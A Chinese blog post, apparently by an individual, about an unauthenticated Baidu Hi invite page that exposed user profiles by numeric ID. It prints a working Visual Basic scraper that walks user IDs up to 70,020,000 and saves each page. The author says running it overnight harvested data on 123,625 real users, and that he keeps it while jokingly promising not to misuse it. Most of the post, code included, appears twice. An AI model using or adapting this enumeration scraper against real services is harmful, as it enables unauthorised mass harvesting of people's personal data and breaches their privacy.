头一次听说这个和Baidu Hi有关的漏洞是在cnBeta,文章现在已经被和谐了。
Google上还有一些结果,但是也将陆陆续续被和谐。
不过不要紧,我送上的截图中就能比较出"出事时"和"出事后"的情况。
Baidu的动作是"很快"的,今天一早已经修改了网站而且完成"危机公关"了。
我得知的时候是昨晚,于是闲着无聊写了下面的程序:
------- ------- ------- ------- -------
Option Explicit
Dim BD_UID As Long
Private Sub Command1_Click()
BD_UID = 1
Web_Nav BD_UID
End Sub
Private Sub Web_Nav(BD_UID)
Label.Caption = BD_UID
Web_Core.Navigate "http://im.baidu.com/invite/groupauth.php?uid=" & BD_UID
End Sub
Private Sub Web_Core_DocumentComplete(ByVal pDisp As Object, URL As Variant)
If BD_UID = 0 Then Exit Sub
Text_Box = Web_Core.Document.body.innertext
Open App.Path & "baidu" & BD_UID & ".txt" For Output As #1
Print #1, Text_Box.Text
Close #1
If BD_UID = 70020000 Then Exit Sub
BD_UID = BD_UID + 1
Web_Nav (BD_UID)
End Sub
------- ------- ------- ------- -------
这个程序的结果是怎样呢?
结果是让我的电脑通过一个晚上的努力,下载了Baidu上 123625 个用户的资料。
数据其实也"并不敏感",就是用户ID,用户名,好友数等等"而已"。
但是不要忘记,这是一个缺乏安全感的互联网时代。
用户ID,已经可以做很多事情了。
123625 个用户ID意味着什么?
呵呵,对我来说意味着Baidu没有资格从事所谓的C2C了。
你放心把自己的银行卡和其他敏感数据交给这样一间犯"低级错误"的公司吗?
至少我不放心。
最后说说百度修改后的页面:
我觉得百度仿佛就没有利害一点的PHP程序员了,页面修改后依然觉得很赤裸,更别谈专业了。
真不明白加个权限认证才能访问这个页面原来也这么难呀。
牛B的百度,一错再错了,Beta也不是可以不负责任的。
PS:Baidu上的用户请放心,你们的资料放在我这儿"绝对安全",本人承诺不会偷看,也不会胡乱使用里面的资料做坏事。
Google上还有一些结果,但是也将陆陆续续被和谐。
不过不要紧,我送上的截图中就能比较出"出事时"和"出事后"的情况。
Baidu的动作是"很快"的,今天一早已经修改了网站而且完成"危机公关"了。
我得知的时候是昨晚,于是闲着无聊写了下面的程序:
------- ------- ------- ------- -------
Option Explicit
Dim BD_UID As Long
Private Sub Command1_Click()
BD_UID = 1
Web_Nav BD_UID
End Sub
Private Sub Web_Nav(BD_UID)
Label.Caption = BD_UID
Web_Core.Navigate "http://im.baidu.com/invite/groupauth.php?uid=" & BD_UID
End Sub
Private Sub Web_Core_DocumentComplete(ByVal pDisp As Object, URL As Variant)
If BD_UID = 0 Then Exit Sub
Text_Box = Web_Core.Document.body.innertext
Open App.Path & "baidu" & BD_UID & ".txt" For Output As #1
Print #1, Text_Box.Text
Close #1
If BD_UID = 70020000 Then Exit Sub
BD_UID = BD_UID + 1
Web_Nav (BD_UID)
End Sub
------- ------- ------- ------- -------
这个程序的结果是怎样呢?
结果是让我的电脑通过一个晚上的努力,下载了Baidu上 123625 个用户的资料。
数据其实也"并不敏感",就是用户ID,用户名,好友数等等"而已"。
但是不要忘记,这是一个缺乏安全感的互联网时代。
用户ID,已经可以做很多事情了。
123625 个用户ID意味着什么?
呵呵,对我来说意味着Baidu没有资格从事所谓的C2C了。
你放心把自己的银行卡和其他敏感数据交给这样一间犯"低级错误"的公司吗?
至少我不放心。
最后说说百度修改后的页面:
我觉得百度仿佛就没有利害一点的PHP程序员了,页面修改后依然觉得很赤裸,更别谈专业了。
真不明白加个权限认证才能访问这个页面原来也这么难呀。
牛B的百度,一错再错了,Beta也不是可以不负责任的。
PS:Baidu上的用户请放心,你们的资料放在我这儿"绝对安全",本人承诺不会偷看,也不会胡乱使用里面的资料做坏事。
